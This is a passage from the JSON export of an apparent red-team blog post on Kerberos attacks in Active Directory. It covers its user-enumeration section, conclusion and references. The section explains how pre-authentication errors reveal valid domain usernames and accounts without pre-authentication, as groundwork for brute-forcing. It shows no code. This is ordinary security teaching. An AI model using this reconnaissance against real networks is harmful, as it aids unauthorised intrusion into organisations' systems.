\/><\/p>\n<h2><span class=\"ez-toc-section\" id=\"Constrained_delegation\"><\/span>Constrained delegation<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>To be discussed in a separate blog post.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"User_enumeration\"><\/span>User enumeration<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>If you try authenticating with an invalid username, Kerberos stops the process at the pre-authentication step and you will get the following error:<\/p>\n<p><img class=\"alignnone size-full wp-image-674\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/54.png\" alt=\"\" width=\"920\" height=\"193\" \/><\/p>\n<p>You can rely on that to enumerate domain users without even being part of the domain!<br \/>\nPractically this is very useful in many situations, as all you need is to be able to connect to the KDC.<\/p>\n<p><img class=\"alignnone size-full wp-image-675\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/55.png\" alt=\"\" width=\"868\" height=\"156\" \/><\/p>\n<p>You can get the valid usernames, which would save you tons of time while brute-forcing services, along with the users that do not require pre-authentication.<br \/>\nThat would give you a good foothold in many situations.<\/p>\n<h1><span class=\"ez-toc-section\" id=\"Conclusion\"><\/span>Conclusion<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>Woooo, finally it&#8217;s over.<br \/>\nI intended to split this blog into 2 or 3 parts, but found that it may be better to put as many techniques as I can into a single post so that the reader does not get lost between many parts on the same topic.<br \/>\nI&#8217;ve discussed how Kerberos works, tried to explain it as well as I can, and covered most of the attacks directly related to Kerberos authentication.<br \/>\nI tried to be as straight to the point as I could while illustrating the things that were once confusing to me; hopefully I succeeded in doing so.<br \/>\nI will probably continue this series, so if you have any comments or suggestions, or found something wrong in this blog post (I&#8217;m sure I missed something), feel free to reach me at <a href=\"https:\/\/twitter.com\/0x4148\">@0x4148<\/a>.<br \/>\nTill next time,<br \/>\nAhmed<\/p>\n<h1><span 
class=\"ez-toc-section\" id=\"References\"><\/span>References<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p><a href=\"https:\/\/docs.microsoft.com\/pt-pt\/previous-versions\/windows\/server\/cc772815(v=ws.10)?redirectedfrom=MSDN\">How the Kerberos Version 5 Authentication Protocol Works<\/a><br \/>\n<a href=\"https:\/\/docs.microsoft.com\/en-us\/windows-server\/security\/kerberos\/kerberos-authentication-overview\">Kerberos Authentication Overview<\/a><br \/>\n<a href=\"https:\/\/techcommunity.microsoft.com\/t5\/ask-the-directory-services-team\/kerberos-for-the-busy-admin\/ba-p\/395083\">Kerberos for the Busy Admin<\/a><br \/>\n<a href=\"https:\/\/winprotocoldoc.blob.core.windows.net\/productionwindowsarchives\/MS-SFU\/%5bMS-SFU%5d.pdf\">Kerberos Protocol Extensions: Service for User and Constrained Delegation Protocol<\/a><br \/>\n<a href=\"https:\/\/adsecurity.org\/?page_id=183\">SPNs<\/a><br \/>\n<a href=\"https:\/\/tools.ietf.org\/html\/rfc6806.html\">Kerberos Principal Name Canonicalization and Cross-Realm Referrals<\/a><br \/>\n<a href=\"https:\/\/tools.ietf.org\/html\/rfc4121\">The Kerberos Version 5<\/a><br \/>\n<a href=\"https:\/\/www.blackhat.com\/docs\/us-14\/materials\/us-14-Duckwall-Abusing-Microsoft-Kerberos-Sorry-You-Guys-Don't-Get-It-wp.pdf\">Abusing Kerberos<\/a><br \/>\nAnd almost every single blog at <a href=\"https:\/\/posts.specterops.io\">posts.specterops.io<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Kerberos authentication is one of the cores of the AD, knowing how it works facilitates the deep understanding of many 
attacks.<\/p>\n","protected":false},"author":2,"featured_media":472,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[62,61],"tags":[],"class_list":["entry","author-a-sultan","has-excerpt","post-572","post","type-post","status-publish","format-standard","has-post-thumbnail","category-active-directory","category-red-teaming"],"_links":{"self":[{"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/posts\/572","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/comments?post=572"}],"version-history":[{"count":30,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/posts\/572\/revisions"}],"predecessor-version":[{"id":685,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/posts\/572\/revisions\/685"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/media\/472"}],"wp:attachment":[{"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/media?parent=572"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/categories?post=572"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/tags?post=572"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}